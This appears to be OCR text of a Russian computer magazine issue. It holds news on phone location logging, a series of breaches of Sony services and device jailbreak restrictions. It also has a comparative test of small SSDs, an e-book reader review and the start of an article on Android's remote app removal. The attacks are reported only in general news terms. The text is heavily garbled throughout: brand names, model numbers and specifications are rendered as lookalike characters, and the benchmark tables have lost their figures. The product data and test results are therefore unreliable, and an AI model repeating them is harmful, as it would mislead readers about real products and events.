хотя достаточно было бы и последних 7-10 
дней. Эти досадные «упущения» Арр(е быстро 
поправила, выпустив обновление для !О5 4.3.3. 
Был ограничен объем базы, сбор данных стало 
действительно возможно отключить, и Пипе 
больше не сохраняет резервную копию лога. На 
этом скандал, в общем-то, поутих, однако Арр(е 
и Соод(е еще долго придется разбираться сего 
последствиями. Против компаний подан целый 
ряд исков отвозмущенных граждан. Суммы в 
исках фигурируютнемалые, например, две жи- 
тельницы штата Мичиган требуют от боод(е ком- 
пенсацию в размере 50 миллионов долларов 

и настаивают на полном изъятии из продажи 
аппаратов слокационным функционалом. 


ХАКЕРЫ ВСЕГО МИРА ОПОЛЧИЛИСЬ НА $0МУ 


РЕАУЗТАТ!О № 
Мегмогк 


Похоже, кто-то проклял компанию 5опу. С тех 
пор как 5опу попыталась засудить Джорджа 
«СеоНо{> Хотца за взлом своих консолей, про- 
шло совсем немного времени, но эти месяцы 
стали настоящей черной полосой для япон- 
ского гиганта. На страницах прошлых номеров 
мы уже рассказывали отом, что Хотц призвал 
всех бойкотировать компанию [несмотря нато, 
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что конфликт между ним и 5опу разрешился 
миром), что анонимусы и хактивисты-одиночки 
собрались мстить за беороГа и просто «за 

все хорошее». Рассказывали мы отом, что 

был взломан Р[ау{а{оп Ме{\м/огк, в ходе чего 
произошла крупная утечка данных. 5опу не 
сумела защитить имена, логины, пароли, даты 
рождения, адреса и другую конфиденциальную 
информацию пользователей, атакже, возмож- 
но, и данные об их банковских картах. Но зло- 
ключения 5опу на этом не закончились. Стало 
только хуже. На данный момент взломы и атаки 
на различные сервисы компании уже исчисля- 
ются десятками. Анонимусы, кстати, отрицают 
свою причастность ко всей этой вакханалии и 
утверждают, что указывающие на них свиде- 
тельства можно было элементарно подделать. 
«Что же поломали?» — спросишьты. Во-первых, 
снова подвергся атакам Р\ау{айоп Ме\могк. 
Сервиснеуспел толком заработать, как снова 
полег — нашлась новая уязвимость, на этот раз 
подкачала страница восстановления логина и 
пароля. Оказалось, что хакеру достаточно знать 
дату рождения и егта(-адрес, на который за- 


регистрирована учетная запись пользователя, 
чтобы обойти систему генерации одноразовых 
паролей. На моментнаписания этой ново- 

сти, сервис все еще лежит. Во-вторых, путем 
обычной 5О[-инъекции взломали онлайновый 
магазин канадского отделения 5опу-Ёптс$5оп. 
В-третьих, взломали сайт $опу ВМС в Греции, а 
затем японский 5опу Мисс арап. Болеетого, во 
время всех этих атак личные данные пользова- 
телей снова попали в руки хакеров! Взломщики 
выложили образцы данных в Сеть [можно по- 
смотреть на {Веваскегпеми®.согп}. Складывается 
впечатление, что в каждом сайте и сервисе 5опу 
хакеры сейчас видятлишь новую мишень. В 
компании же, тем временем, размышляют, ане 
назначить ли вознаграждение заинформацию 
о взломщиках, чтобы их было проще ловить. По- 
хоже, 5опу не желаетучиться на своих ошибках 
и не понимает, что такими заявлениями лишь 
провоцирует хактивистов всего мира действо- 
вать. Не вознаграждения назначать нужно, а 
менять штат специалистов по безопасности и 
серьезно задуматься о направлении политики 
компании. 
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Не все компании отваживаются выступать против джейлбрейка 
своих устройств так же открыто и рьяно, как многострадальная 5опу. 
Ведь на примере последней ярко видно, что ни к чему хорошему 

это не приводит. Поэтому производители стараются действовать 
исподволь, более хитро. Так стало известно, что М!сго$ой отказы- 
вает «взломанным» аппаратам на базе \\/!п4ом/5 РПопе 7 в доступе к 
обновлениям. Начиная с последней версии прошивки под кодовым 
номером 7392, выпущенной 3 мая, автоматически проверяется ПО, 
установленное на смартфоне. Если вдруг окажется, что этот софт был 
установлен в обход официального механизма, новая версия прошив- 
ки не будет загружаться на смартфон. Не дремлети Сбооч(е, правда 
«компания Добра» действует не столь категорично. Пока обнаружи- 
лось, что боод(е не пускает аппараты, владельцы которых добрались 
до гос{-доступа, в новый кинопрокатный сервис. Пользователи 
просто видятошибку: «ГаЦед то Ее св Исепзе Гог [название фильма] 
(еггог 49]». Пока это, конечно, мелочи, но за ними может последовать 
настоящая лавина закручивания гаек. 


АЧТО, ЕСЛИ НЕ ТОРРЕНТЫ? 


На Западе стремительно набирает популярность сервис Мех, и 
аналитики уже заговорили о том, что МейИх и его аналоги вполне мо- 
гут погубить торрент-сети. Это отнюдь не мрачное предсказание, так 
как модель, используемая Мех, напротив, могла бы решить много 
проблем и поумерить вечный батхерт борцов за авторские права. 
Лучше всего картину иллюстрируют цифры: еще в первом квартале 
2010 года прирост новых пользователей ресурса почти удвоился, со- 
ставив 3,3 миллиона против 1,7 миллиона в начале года. На сегодня 
абонентскую базу Ме{Их составляют уже 22 800 000 человек, которые 
принесли сервису $706 млн только за первый квартал 2011 года. А 
секреттакой популярности прост — абонентская плата, начинаю- 
щаяся со смешных 8 долларов в месяц, удобный и продуманный 
интерфейс и всегда свежие фильмы, сериалы и игры, в отличных 
копиях, без глюков и абсолютно легально. И не нужно рыскать по 
трекерам, мучиться с активацией [если речь об игре] или смотреть 
экранки. Словом, весь «секрет» заключается в богатейшей фильмо- 
и игротеке и в низкой абонентской плате. К тому же, покупать контент 
можно с 'РБопе, (Рад, ХВох, Р{[ау{аНоп Зи других девайсов. Хотелось 
бы написать, что со временем таких сервисов обязательно станет 
больше, контент на них будет появляться моментально, люди пред- 
почтут небольшую абонентскую плату и удобство халяве, а копирасты 
наконец успокоятся и вздохнут с облегчением, но... К сожалению, 
большинство правообладателей видят «светлое будущее» иначе, и 
им выгоднее утверждать, что качать видео из Сети — страшное пре- 
ступление. Однако иногда все же хочется верить. 
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МГЕЖЕВ. ВОСК Е5001 


з МЕТРО 2033. ДМИТРИЯ ГЛУХОВСКОГО М ОЩЕ ДВА РОМААНА КУЛЬТОВСЬЯ СЕРНМ БЕСПЛАТНО 
@ ЭТОЙ ЭЛЕКТРОННОЙ ИНИГЕ МАЕХЫЕЯ 


КОМФОРТНОЕЧ 


ИНиГ 


% шехьег. 


БОЛЕЕ 200 ТЫС. 


РАЛИСЕ И ВАРТ 


ЧТИСНЫЕ 31 ТЫС. 
СТРАНИЦ 
ПОЛЛАРАДНИ 


млАгии лех ег.Ги мы 
ТЕПЕФОНН ГОРЯЧЕЙ ЛИНИИ: 8 (800) 200 95 60 


и 


Ш № Длександр Михеев 


ДОСТУПНОЕ УСКОРЕНИЕ 


Тестирование 550-накопителей небольшого объема 


© Аббревиатура 550 с каждым днем становится все менее таинственной 
для рядового пользователя. И если еще год назад эти загадочные 
устройства использовались лишь техноманьяками с хорошим 
достатком, то сейчас соотношение цены и производительности 
твердотельных накопителей способно заинтересовать многих. 


550 — большая флешка? 


Прогноз неизбежного триумфа 550 над НОП вполне оправдан, ведь 
устройства, содержащие в себе ЦазВ-память (основу любого «твердо- 
тельника»), окружают нас довольно долго. Это и сотовые телефоны, и 
коммуникаторы, и плееры, и ЧУ$В-флешки, атакже другие мобильные 
гаджеты. Неудивительно, что теперь вездесущая флеш-память пытается 
отнятьу НОО титул монополиста в хранении информации на ПК. Однако 
обычные «флешки» не в состоянии тягаться с современными жесткими 
дисками, поэтому необходимо было этутехнологию доработать. Таким 
образом на свет появились 550. Несмотря на все сходство с младшими 
братьями, различия налицо. Во-первых, твердотельные накопители 
содержат не один, а несколько чипов Цазй-памяти, информация на 
которых записывается поочередно, на манер КА! 0. Для покорения высот 
производительности на печатную плату накопителя нередкоустанав- 
ливают отдельную микросхему кэш-памяти. И, наконец, 550 получили 
гораздо более продвинутые контроллеры, нежелите, что используются во 
«флешках». Это обусловлено не только гонкой за скоростью, но и другим 
не менее важным моментом — продлением срока службы твердотельного 
накопителя, для чего используются самые разные алгоритмы работы с 
ячейками МАМ0-памяти. 


Жизненный ресурс 


Срок службы — один из важнейших вопросов, который мучает пользо- 
вателя перед покупкой 550 в свое личное пользование. Несмотря нато, 
что давно канули в летуте времена, когда информацию начипе памяти 
можно было переписать всего один раз, МАМО-память все равно имеет 
свои ограничения. К примеру, у МЕС-ячеек, наиболее популярных в 
производстве 550, жизненный ресурс колеблется около отметки в 10000 
циклов чтения/записи, вто время как 5 С-ячейки способны выдержать в 
десять раз больше. Но последние, к сожалению, обладаютвдвое меньшей 
плотностью записи, а 55$0-накопители на их базе стоят гораздо дороже. 
Для снижения износа ячеек современные контроллеры используют раз- 
личные алгоритмы равномерной нагрузки, что в несколько разповышает 
надежность 550. Не зря же производители дают несколько лет гарантии. 


Производительность 


Как всем известно, удаленные файлы не исчезаютс накопителя, алишь 
помечаются ОС какудаленные. Эта система прекрасно работала с НОО, у 
которого процесс перезаписи не занимал лишнего времени. С $50 дело 
обстоит по-другому, и связано это с особенностями МАМО-памяти. Ячейки 
вней объединены в страницы по 4 Кбайт, а страницы — в блоки по 512 
Кбайт. Поэтому процесс перезаписи у 550 сложнее и дольше, нежелиу 
НОО. Сначала в кэш копируется весь блок в512 Кбайт, внем удаляются 
необходимые страницы и записываются новые, после чего весь блок сти- 
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ТЕСТОВЫЙ СТЕНД 


ПРОЦЕССОР: 1мецСоге 17-975 Ехигете, @ 3466 МГц 
СИСТЕМНАЯ ПЛАТА: 451$ Р6Х580 Ргетит 
ВИДЕОКАРТА: мм беРогсе СТ 240 

ОПЕРАТИВНАЯ ПАМЯТЬ: Кипдзкоп 9905471-002.АООЕЕ 
@1333 МГц, 3х2 Гб 

НАКОПИТЕЛЬ: согзаи" С5$0-Е120682, 120 Гб 

БЛОК ПИТАНИЯ: Е$РЕРЗИ.ОМ 80 РЦ, 900 Вт 


0С: пом 7 Максимальная х32 


рается с диска, а на его место копируется блок из кэша. На этоу контрол- 
лера «твердотельника» уходит больше времени, чем на запись в пустые 
блоки. Поэтому, когда чистых, ни разу не использовавшихся ячеек на на- 
копителе больше нет, 550 начинает работать заметно медленнее. Самым 
современным решением этой проблемы на сегодняшний деньявляется 
функция ТЕМ, которая должна поддерживаться как ОС [М/пдом. 7 или 
\МАпаом/$ бегуег 2008}, так и самим накопителем. Суть ее состоит втом, что 
данные счипов памяти стираются сразу при удалении их из «корзины», а 
не остаются дотех пор, пока ихне перезапишут новыми. С одной стороны, 
это позволяет 550 нетерять своей производительности, с другой — делает 
совершенно бесполезными все программы по восстановлению данных. 


Методика тестирования 


Для того чтобы хорошенько протестировать 550 и выявить их настоящие 
возможности, мы воспользовались тремя проверенными временем 
программами. Первым былтестРСМагК \Уа{аде, показавший быстро- 
действие накопителей в обычных условиях, вроде загрузки \\Ип4о\/$ или 
редактирования видео в \\ЛпЧо\м/5 Моме МакКег. Дальше по списку шел 
|Отпег, с помощью которого определялись скорости чтения и записи, 
сначала последовательные (с блоком 128 Кбайт}, потом произвольные (с 
блоком 4 Кбайт). Онже [на примере нескольких паттернов] смог показать, 
как проявят себя накопители в составе веб-сервера или же файлово- 

го сервера. Наконец, синтетическим тестом АТТО 0!5К Вепсбтагк мы 
замеряли производительность при чтении/записи от0,5 до 8192 Кбайт. 
Для того чтобы 550 был в лучшей форме ина 100% готов к преодолению 
«полосы препятствий», он подвергался низкоуровневому форматиро- 
ванию. То есть информация изячеек стиралась и больше не отвлекала 
контроллер накопителя лишними операциями перезаписи. И чтобы уж 
точно ничего не занижало показатели производительности, в В!О5'е был 
выставлен режим АСН|. 
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Согзаг 
С$$0-Е40СВ2 


Технические характеристики: 
ФОРМ-ФАКТОР: 2,5 дюйма 

ИНТЕРФЕЙС: ©АТА || 

ТИП ПАМЯТИ: МЕС 

КОНТРОЛЛЕР: ЗапЧРГогсе 5Е-1200 

ЗАЯВЛЕННАЯ СКОРОСТЬ ЧТЕНИЯ: 280 Мб/с 
ЗАЯВЛЕННАЯ СКОРОСТЬ ЗАПИСИ: 270 Мб/с 

ВРЕМЯ НАРАБОТКИ НА ОТКАЗ: 1 млн часов 
ОБЪЕМ: 40 Гб 


УТУ м 


Согзаиг С550-ЁЕ40СВ2 — самый маленький по объему $50 -накопитель 

в нашем тесте. К счастью, это никак не отразилось на его скоростных 
характеристиках. Он может похвастаться не только достойной скоро- 
стью чтения, но и почти схожей — при записи. Конечно, до заявленных 
производителем «высот» накопитель не дотягивает, но это и не страшно. 
Зато радует, что скорости записи и чтения не сильно различаются. В 
связи с этим стоит отдать должное контроллеру 5ап9Гогсе 5Е-1200, на 
котором основан 40-гиговый «корсар». Занимательно, что в быстродейс- 
твии он не сильно отстает от старшей модели влинейке, представленной 
в нашем тесте — накопителя Согзаг С$50-Е906В2-ВКИКТ. Конечно, 
четыре десятка гигабайт обычные НОП имели уже лет десять назад, но 
они не имели той производительности, что наблюдается у $50 Согзаг 
С$$0-Е40СВ2. Несмотря на свой небольшой объем, устройство может 
хорошо послужить в качестве системного диска, заставив ОС работать 

в разы быстрее. Но если 40 Гб — нетвой размер, то никто не запрещает 
купить два Согзаг С5$0-Е40СВ? и собрать из них массив КА! 0, полу- 
чив не только вдвое больший объем, но итеоретически вдвое большую 
скорость. 


+ Хорошие показатели скорости чтения и записи. 

+ Невысокая цена. 

— Скромный объем, из-за чего папке Ргодгат ЕЦе$ со временем 
станет оченьтесно. 

— Вкомплекте нет крепления для 3,5-дюймового отсека. 
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Согзаг 
С$$0-Е90СВ2-ВЮКТ 


Технические характеристики: 
ФОРМ-ФАКТОР: 2,5 дюйма 

ИНТЕРФЕЙС: ©ЛТА || 

ТИП ПАМЯТИ: МЕС 

КОНТРОЛЛЕР: бапЧГогсе 5Е-1200 

ЗАЯВЛЕННАЯ СКОРОСТЬ ЧТЕНИЯ: 285 Мб/с 
ЗАЯВЛЕННАЯ СКОРОСТЬ ЗАПИСИ: 275 Мб/с 

ВРЕМЯ НАРАБОТКИ НАОТКАЗ: 1 млн часов 

ОБЪЕМ: 90 Гб 


Согзаг С550-Е90СВ?-ВВКТ, каки следовало ожидать, отличается от 
своего младшего брата лишь объемом. А вот90 Гб информации с запасом 
хватит и для системы, и для установки разнообразных программ, места 
останется даже для нескольких грузных приложений [например, игр). Од- 
нако и стоит этот 550 почти в два раза больше. Скорость за эти деньги мы 
получаем даже немного большую, чему Согзаг С5$0-Е40СВ2. Особенно 
хорошо это видно по результатам бенчмарка РСМагк Уааде. 
Производительность — это замечательно, но что можно сказать о сроке 
службы? За него можно не волноваться, ведь оба «корсара» поддержи- 
ваютТКМ и, по словам производителя, готовы прослужить тебе миллион 
часов. Так что эти «ребята» скорее устареют морально, чем выйдут из 
строя. Еще один бонус Согзаг С5$0-Е90СВ2-ВККТ, пусть и скромный 

— наличие в коробке крепления для 3,5-дюймового отсека корпуса. 
Практично! В целом, Согзаг С5$0-Е906В2?-ВККТ отлично подойдет для 
того, чтобы, не раздумывая, поставить на него ОС и не беспокоиться, что 
места хватиттолько избранным программам. 


-+- Достаточный объем. 

++ Быстрое чтение и запись: второе место среди тестируемых 
накопителей. 

— Цена пока немного «кусается». 
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\Амие 


Кпаз$оп 
$\Р100Е$2/64С 


Технические характеристики: 
Форм-фактор: 2,5 дюйма 

Интерфейс: 5АТА || 

Тип памяти: МЕС 

Контроллер: Тоба Т6ОС1ХВС 

Заявленная скорость чтения: 230 Мб/с 

Заявленная скорость записи: 180 Мб/с 

Время наработки на отказ: 1 млн часов 

Объем: 64 Гб 


УТУ им 


Порой вскрытие — единственный способ разведать, какой контроллер 
установлен втом или ином 550. В случае с Ктдазоп 5/Р100Е52/646 
главным действующим лицом оказался ТОЗН!ВА Т6ОС1ХВС, обеща- 
ющий 230 Мб/с линейного чтения и 180 Мб/с — записи. На деле же, то 
бишь в тестах, вышлоеще лучше. Но что касается скорости случайной 
записи, то тут Кптд${оп 5\/Р100Е$2/64С показал худшие результаты 
среди прочих участников. 

Зато, возможно, тебе придется по вкусу аппаратная поддержка 
128-битного шифрования на основе АЕЪ. Если верить сайту Ктд$Топ, 
это означает отсутствие потерь производительности по сравнению с 
программным шифрованием. Таким образом, там, где нужна безо- 
пасность, этот не самый быстрый накопитель должен показать себя с 
лучшей стороны. 

Нельзя упускать из виду и то, что Кта${оп поставляет свои 550 в двух 
вариациях: просто сам накопитель в пластиковой упаковке, и он же в 
комплекте с кабелем $АТА, металлическими салазками и особым 6бо- 
нусом — пластиковым корпусом, в который можно вставить как старый 
2,5-дюймовый ноутбучный НОО, таки сам Ктаз{оп 5/Р100Е52/64С, 
превратив устройство во внешний накопитель с интерфейсом ЦЪВ 2.0. 
С позиции практичности устройству Ктд$оп в этом тесте, пожалуй, 
нет равных. 


+ Поддержка аппаратного шифрования. 


+ Свобода выбора при покупке $50. 
— Низкая скорость произвольного чтения. 
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ОС2 
0С25502-2\УТ1ТХ60С 


Технические характерист ИКИ: 
ФОРМ-ФАКТОР: 2,5 дюйма 

ИНТЕРФЕЙС: ©ЛТА || 

ТИП ПАМЯТИ: МЕС 

КОНТРОЛЛЕР: бапЧГогсе $Е-1200 

ЗАЯВЛЕННАЯ СКОРОСТЬ ЧТЕНИЯ: 285 Мб/с 
ЗАЯВЛЕННАЯ СКОРОСТЬ ЗАПИСИ: 275 Мб/с 

ВРЕМЯ НАРАБОТКИ НА ОТКАЗ: 2 млн часов 

ОБЪЕМ: 60 Гб 


Накопитель ОСА 0С75502-2\/1ТХ60С — представитель второго поколения 
линейки \ецех. Первый же Уе“ех еще можно найти в продаже. Поэтому 
модель прошлого поколения до сих пор продолжает продаваться как 
недорогое решение сзаявленными 230/135 Мб/с последовательного 
чтения и записи соответственно (для накопителя объемом 64 Гб). Это 
отнюдь не плохо, но уже не «торт». Ведь 60-гигабайтный Уекех 2, онже 
герой нашего теста — 0С70С75502-2\/ТХ6ОС, по словам производи- 
теля, способен продемонстрировать нетолько 285 Мб/с для линейного 
чтения, но и почти такую же скорость линейной записи. А именно — 275 
Мб/с. Таких же высоких цифр втесте нам добиться не удалось, но в целом 
по производительности ОС7 0С75$02-2\/ТХ60С идет вровень с Согза!г 
С$$0-Е9068В2-ВККТ. 

Но этоеще не конец, ведь нетак давно ОС/ анонсировалатретье поко- 
ление 550 -линейки \ецех. Новые накопители будут основаны на базе 
контроллера 5апЧ9Гогсе Е -2200, что означает завидную скорость в 500 
Мб/с на чтение и запись. Цены на новые накопители пока неизвестны, 
но влюбом случае Уекех 2 будет стоить дешевле [из-за того, что моделей 
подобного объема больше не будет, минимум 120 Гб}, и поэтому лучше 
подойдет для тех, кто хочет опробовать 550 на шкуре собственного ком- 
пьютера без значительных денежных вложений. 


+ Вдвое больший ресурс — 2 млн часов. 


+ Почти одинаково высокая скорость чтения и записи. 
+ Крепление для 3,5-дюймового отсека корпуса. 
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ВНЕ КОНКУРСА 


оЙсоп Ромег 
$Р128СВ$$0Е20$25 


Технические характеристики: 
ФОРМ-ФАКТОР: 2,5 дюйма 

ИНТЕРФЕЙС: ©АТА || 

ТИП ПАМЯТИ: МЕС 

КОНТРОЛЛЕР: /МЕ616 

ЗАЯВЛЕННАЯ СКОРОСТЬ ЧТЕНИЯ: 250 Мб/с 
ЗАЯВЛЕННАЯ СКОРОСТЬ ЗАПИСИ: 230 Мб/с 

ВРЕМЯ НАРАБОТКИ НА ОТКАЗ: п/а 

ОБЪЕМ: 128 Гб 


УК м 


Специально для тех, кого смущают цифры 40, 60 и 64, когда речь идет 

об объеме внутреннего накопителя для ПК, мы решили протестировать 
более тяжеловесный 550. Накопитель 5 Шсоп Ромег5Р12868В5$0Е20$525 
может похвастаться уже 128 Гб МАМО-памяти, что даже более чем 
достаточно для создания системного диска и установки всех нужных 
программ. Что называется, поставил — и больше не беспокоишься. 
Однако кое-что все-таки вызвалоу нас беспокойство. Несмотря на неод- 
нократную перепроверку, 5Шсоп Ромег$Р1286В$$50Е?20$25 справился 
со случайным чтением хуже, чем с записью, что сильно подпортило его 
общие результаты. Зато в последовательном чтении этоттвердотельный 
накопитель продемонстрировал недосягаемый для остальных участ- 
ников теста результат — 249,99 Мб/с, оправдав заявленный произво- 
дителем показатель. Скорость линейной записи, правда, оказалась на 
одну пятую ниже, однако 202 Мб/с — тоже довольно солидная величина. 
Неутешительными оказались результаты тестов, имитирующих работу в 
настоящих условиях. Видимо, отразилась скорость случайного чтения. 
Но, несмотря на это, ты все равно почувствуешь большую прибавку про- 
изводительности, заменив на 5Шсоп Ромег5Р12868В5$0Е20$25 старый 
винчестер своего ноутбука. А объема в 128 Гб будетуже вполне достаточ- 
но, чтобы комфортно работать за лэптопом или десктопом. 


-- Большой объем. 


+ Высокая скорость последовательного чтения. 
р Довольно низкая общая производительность. 
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Тгапзсепа 
Т$56465$025$-М 


Технические характеристики: 
ФОРМ-ФАКТОР: 2,5 дюйма 

ИНТЕРФЕЙС: ©АТА || 

ТИП ПАМЯТИ: МЕС 

КОНТРОЛЛЕР: /М!сгоп /МЕ612 

ЗАЯВЛЕННАЯ СКОРОСТЬ ЧТЕНИЯ: 240 Мб/с 
ЗАЯВЛЕННАЯ СКОРОСТЬ ЗАПИСИ: 110 Мб/с 

ВРЕМЯ НАРАБОТКИ НА ОТКАЗ: 1 млн часов. 

ОБЪЕМ: 64 Гб 


УТУ ум 


Последним по списку накопителем в нашем тесте оказался Тгапзсепа 
1$6465$0255-М. В первую очередь его хочется похвалить за то, что 

он даже превысил заявленные производителем показатели скорости 
линейного чтения и записи приблизительно на 7 и9 Мб/с соответствен- 
но. Однако общая производительностьу Ггапзсепа 156465$025$5-М 
оказалась далеко не на высоте. Это напрямую связано с низкой ско- 
ростью последовательной записи. Среди всех рассмотренных выше 
550 Тгапзсепа 156465$0255-М оказался единственным, чья скорость 
записи значительно ниже скорости чтения. Этот показатель не могне 
повлиять на остальные параметры, но, тем не менее, в других тестах 
Тгапзсепа 1564655025$-М показал, что в редких случаях может дать 
фору накопителям с большей линейной скоростью записи. С остальными 
же параметрамиу Тгапзсепа 15646$50255$-М все в порядке. Шестиде- 
сяти четырех гигабайт с лихвой хватит для создания системного диска, 
ажизненный ресурс в один миллион часов позволит не волноваться за 
здоровье нового «550-шного» друга. 

Поверхность накопителя сделана из глянцевого пластика, но ни ее, ни 
отпечатков пальцев на ней все равно видно не будет, ведь интерфейс 
АТА П предполагает использование устройства внутри ПК или лэптопа. 


+ Скорости последовательного чтения и записи выше заявленных. 
— Низкая скорость линейной записи. 
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РЕЗУЛЬТАТЫ ТЕСТОВ 


оРСМагк Уащаце, баллы 


Согзаи (5$0-Е4068В2 

Согзаи (5$0-[906В2-ВККТ 
Кпо$фоп $УР100Е$2/646 

067 0675$02-21Х606 

ЭЩсоп Ромег $Р12868550Е20$25 


Тапзсеп4 15646550255-М 
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э|[0тщег РаКегп$, Мб/с 
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Кпо$фоп $УР100Е$2/646 

067 0675502-2\ТХ606 

ЭЦсоп Ромег$Р12868550Е20$25 
Тапзсепд 15646$$0255-М 
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В общем-то, паттерны лишний раз подтвердили то, что уже 
итак понятно 


оРСМагк \ащадце, Мб/с 


Согсаи С550-Е40682 


Кпо$фоп $УР100Е$2/646 
007 0675$02-2УТХ606 


Согзай 65$0-Е90682-ВВКТ нии 


э|[0тег гапдот 4 Кбайт, Мб/с 
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ЭЦсоп Ромег$Р12868550Е20$25 
Ттапзсепд 15646$$0255-М 
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Произвольные чтение и запись не для всех накопителей 
оказались простой задачей 


оО тег 5ециеп(а( 128 Кб, Мб/с 


Согзат С550-Е406В2 

Согзаи С5$0-Е906В2-ВВКТ 
Кпо$фоп $УР100Е52/646 

067 0675502-2УТХ606 

ЭЦсоп Ромег$Р12868550Е20$25 
Ттапзсепд 15646$$0255-М 


Веай 
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Вотони — заветные показатели, притягивающие столько 
внимания ктвердотельным накопителям 


„= \\ИпЧоми$ Ое{епфег 
„„ бато 
=. |Прото Рус{иге$ фо \\пдоми$ Рнофо баЦегу 
„= \\пЧом$ У ${а Заир 
„„ \/\Чео е Что МИпдом$ Моме МаКег 
„= \\ппдом$ Мефа Сещег 
АЧЧто ти$1с 0 УПпдом$ Медта Р(ауег 
„. АррИсаНоп [оа@!п9 


ЭЩсоп Ромег 5Р12868550Е20525 ЕЕ 


Папзсеп4 15646550255-М 
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РСМагк Уагкаде наглядно показал не только общую производительность, но и сильные и слабые стороны $$0 


ПОДВОДИМ ИТОГИ 


Итак, пришло время делать выбор. Он не будет очень сложным. Если 
тебе хочется за минимальные деньги почувствовать всю «мощь» твер- 
дотельных накопителей, то следует присмотреться к Согзаг С$$0- 
Е40СВ?2. За свою высокую производительность и умеренную цену он 
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получает награду «Лучшая покупка». «Выбором редакции» заслужен- 
но становится твердотельный накопитель ОС 0С75$02-2\УТХ6ОС. Этот 
550 по скоростным характеристикам делит первую строчку с С$$0- 
Е7ОСВ?-ВККТ по производительности, зато обладает ресурсом в 2 млн 
часов безотказной работы, в то время как остальные могут похвастать- 
ся только одним миллионом. == 
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Ш М Николай Арсеньев 


УЕЛГЕВ 
ВООК 17002 


Книга 0ез «чернил» 


Технические 
характеристики 
Дисплей: 7 дюймов, 800х480, 
ЖК, ЕЕО-подсветка 

Память: 4 Гбайт + гп!сго50 (до 


Аудиоформаты: МР3З, \/МА, 
ЕГАС, ААС 

Аккумулятор: встроенный, 
литиевый 

Дополнительно: встроенный 


16 Гбайт] динамик, радио, диктофон, 
Интерфейсы: ЦЗВ 2.0, видеовыход 

миниджек Габариты: 190х120х6 мм 
Текстовые форматы: АМ$!, ТХТ, Вес: 300 г 

РОЕ, НТМИ, Комплект поставки: ЦЪВ- 


ЕВ, РОВ. ЕРОВ 

Форматы изображений: РС, 
УРЕС, ВМР, СЕ 
Видеоформаты: \\/М\, КМ, АМ, 
КМУВ, З6Р, Е\, МР4, МРЕС, 
МК\ 


кабель, сетевой адаптер, 
видеокабель, чехол, наушники, 
три книги серии «Вселенная 
Метро 2033» 

Гарантия: 12 месяцев 


ШЕЕ Г 


МЕХЕЕВ.ВООК 17002 — новый продукт \!ЕХЕЕВ, в котором компания решилась 
на смелый эксперимент, встроив сенсорные клавиши. По сути, мы имеем дело 
не просто с электронной книгой, а скорее — со всеядным медиаплеером. 


Яркий, корпус иэффектный 


М/ЕХЕЕВ.ВООК 17002 получился оченьярким устройством — на выбор 
модели всех цветов радуги. Нам досталась модификация с серебрис- 
тым задником и белоснежной лицевой панелью. Корпус книги сделан 
добротно, он составлен из двух частей, которые отлично подогнаны 
друг к другу. На нижнем торце доступны разъемы Мтсго50, 3,5-мм ми- 
ни-джек под наушники или акустику, видеовыход и порт Мп! ЗВ. Там 
же расположился микрофон, с помощью которого можно записывать, 
например, заметки. Все сенсорные клавиши раскиданы по лицевой 
части, илишь одна — аппаратная. И это — выключатель, располо- 
женный в нижней левой части корпуса. Рядом находятся кнопки Р(ау/ 
Раизе, масштабирования, возврата и вызова меню. Правее располо- 
жены клавиши навигации, коих, традиционно, четыре шпуки. По бокам 
ты найдешь клавиши перелистывания. 


Начинкаи форматы, форматы 
мнио Р ‚ Фор у 


Главная звезда шоу — семидюймовый цветной экран с ЕЕО-подсвет- 
кой и разрешением 800х480 пикселей. Его вполне достаточно для про- 
смотра видео в дорожных условиях. Встроенной памяти 4 Гбайт для 
книжных дел более чем хватает, а под видео- и аудиофайлы разумнее 
использовать карту стандарта М!сго50. 

\ММЕХЕЕК.ВООК 17002 понимает множество форматов книг: ТХТ, РОЕ, 
ЕВ2, ЕРОВ и другие. Кроме того, можно просматривать цветные 
изображения, например, /РС с разрешением до 3162х3162 пикселей. 
Послужной список совместимости с видеофайлами также хорош: \\/М\У, 
АМ, МРЕС и МК\. Однако стоит иметь ввиду, что книга переваривает 
видеопоток максимум 2 Мбит/с. Также М/ЕХЬЕК.ВООК 17002 способна 
проигрывать аудиофайлы, включая МРЗ3, \/МА, ЕГАС иААС. Запись же 
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с микрофона производится в формате \/А\ [32/45 Кбит/с}. Из дополни- 
тельных опций: нельзя пройти мимо встроенного динамика и функции 
радио. 


Практика использования 


Книга довольно быстро включается, навигация оперативна. Главное меню 
встречаетинформативными иконками с подписями, запутаться невоз- 
можно. Раздел «Книги» являет собой библиотеку: просмотр книгпо автору, 
названию, обложке итак далее. 

В главном меню по соседству есть пункт «История», он ускорит доступ к 
тем произведениям, которые ты читаешь сейчас. В режиме чтения есть 
возможность менять размер шрифта, его цвет, а заодно цвет фона. Между 
горизонтальным и вертикальным режимами переключаемся с помощью 
клавиш Р!ау/Раизе. Раздел «Музыка» включаетфильтрацию записей 

по артисту, альбому и даже жанру, доступны разнообразные настройки 
воспроизведения и спецэффекты. По поводу видео мы уже упоминали об 
ограничениях — если их соблюдать, проблем не будет. Джентльменский 
набор включает календарь, калькулятор, атакже пяток игр, среди которых 
естьтетрис и 5окоБап. 

К сенсорным кнопкам придется привыкать, особенно кбоковым. Онитак 

и просятся под палец. Порадовал встроенный динамик, звучит неплохо 

и очень даже громкий. И напоследок: при нажатии клавиш включается 
вибрация — удобно! Крометого, благодаря наличию А\-выхода, элект- 
ронную книжку можно подключить к обычномутелевизору и смотреть свои 
любимые фильмы на большом экране. Кабель для подключения входит в 
комплект поставки. Книга или медиаплеер? 

Еслитебе нуженуниверсальный медиаплеер и возможность читать книги, 
то \/ЕХЕЕКВ.ВООК 17002 — подходящий вариант. Заряда аккумулятора хва- 
тит на семь часов чтения или пять часов прокрутки видео, слушать музыку 
можно хотьтридцать часов, но с отключенным экраном. Градиционным 
бонусом станут книги из вселенной «Метро 2033». == 
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никогда не висит! 


Карта мужского рода 


Специальные мероприятия 


Скидки на компьютерные товары 
И Н@ ТОЛЬКО... 


МММ. „ГИ 


(дате) 


ОАО «АЛЬФА-БАНК». Генеральная лицензия Банка России на осуществление банковских операций от 29.01.1998 №1326. НА ПРАВАХ РЕКЛАМЫ. 


Ш № Капитан Улитка 


АМОКОЮ-МАРИОНЕТКИ 


Система управления 


всеми устройствами на Апдго!: что это? 


© В любой новости про зловредные приложения для платформы Ап- 
го! непременно упоминается механизм, с помощью которого бо00(е 
удаленно удаляет нежелательное ПО со всех устройств разом. Как 
работает эта система, ине может ли она сама стать самым большим 
каналом распространения малвари? 


Начну со статистики. Первый девайс на базе Апаго4 — НТС Огеам/ 
